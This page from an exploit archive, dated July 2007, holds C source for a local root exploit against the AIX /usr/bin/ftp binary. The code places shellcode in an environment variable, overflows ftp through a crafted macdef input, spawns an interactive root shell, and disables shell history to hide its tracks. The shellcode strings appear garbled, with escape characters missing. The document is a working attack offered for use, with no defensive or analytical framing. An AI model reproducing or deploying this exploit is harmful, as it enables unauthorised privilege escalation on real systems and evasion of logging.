Home / exploits aix53-ftp.txt
Posted on 28 July 2007
/* 07/2007: public release * * qaaz@aix:~$ ./aix-ftp * ---------------------------- * AIX ftp Local Root Exploit * By qaaz * ---------------------------- * bash: no job control in this shell * bash-3.00# */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/wait.h> #include <sys/select.h> #define TARGET "/usr/bin/ftp" #define OVERLEN 300 #define MAX(x,y) ((x) > (y) ? (x) : (y)) #define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y)) unsigned char qaazcode[] = "x60x60x60x60x60x60x60x60" "x7cx63x1ax79x40x82xffxfd" "x7exa8x02xa6x3axb5x01x01" "x88x55xffx5bx3axd5xffx1b" "x7exc8x03xa6x4cxc6x33x42" "x44xffxffx02x38x75xffx5f" "x38x63x01x01x88x95xffx5d" "x38x63x01x02x38x63xfexff" "x88xa3xfexffx7cx04x28x40" "x40x82xffxf0x7cxa5x2ax78" "x98xa3xfexffx88x55xffx5c" "x38x75xffx5fx38x81xffxf8" "x90x61xffxf8x90xa1xffxfc" "x4bxffxffxbdxb8x05x7cxff"; void shell(int p1[2], int p2[2]) { ssize_t n; fd_set rset; char buf[4096]; for (;;) { FD_ZERO(&rset); FD_SET(p1[0], &rset); FD_SET(p2[0], &rset); n = select(MAX(p1[0], p2[0]) + 1, &rset, NULL, NULL, NULL); if (n < 0) { perror("[-] select"); break; } if (FD_ISSET(p1[0], &rset)) { n = read(p1[0], buf, sizeof(buf)); if (n <= 0) break; write(p1[1], buf, n); } if (FD_ISSET(p2[0], &rset)) { n = read(p2[0], buf, sizeof(buf)); if (n <= 0) break; write(p2[1], buf, n); } } } /* just because you don't understand it doesn't mean it has to be wrong */ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) { ulong top, len, off; int i; len = 0; for (i = 0; argv[i]; i++) len += strlen(argv[i]) + 1; for (i = 0; envp[i]; i++) len += strlen(envp[i]) + 1; top = (ulong) argv[0] + ALIGN(len, 8); len = off = 0; for (i = 0; args[i]; i++) len += strlen(args[i]) + 1; for (i = 0; envs[i]; i++) { if (!strncmp(envs[i], "EGG=", 4)) off = len + 4; len += strlen(envs[i]) + 1; } while (off & 3) strcat(envs[0], "X"), off++, len++; return top - ALIGN(len, 4) + off; } int main(int argc, char *argv[], char *envp[]) { char pad[16] = "PAD=X", egg[512]; char *args[] = { TARGET, NULL }; char *envs[] = { pad, egg, NULL }; int pi[2], po[2], i; pid_t child; ulong addr; sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); if (!envp[0]) { setuid(geteuid()); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL); perror("[-] execl"); exit(1); } printf("---------------------------- "); printf(" AIX ftp Local Root Exploit "); printf(" By qaaz "); printf("---------------------------- "); if (pipe(pi) < 0 || pipe(po) < 0) { perror("[-] pipe"); exit(1); } addr = get_addr(argv, envp, args, envs); if ((child = fork()) < 0) { perror("[-] fork"); exit(1); } if (child == 0) { dup2(pi[0], 0); dup2(po[1], 1); dup2(po[1], 2); execve(TARGET, args, envs); perror("[-] execve"); exit(1); } write(pi[1], "macdef foo $ foo ab", 20); for (i = 0; i < OVERLEN; i += sizeof(addr)) write(pi[1], &addr, sizeof(addr)); write(pi[1], " ", 1); fflush(stdout); fflush(stderr); close(pi[0]); close(po[1]); shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); kill(child, SIGTERM); waitpid(child, NULL, 0); return 0; }
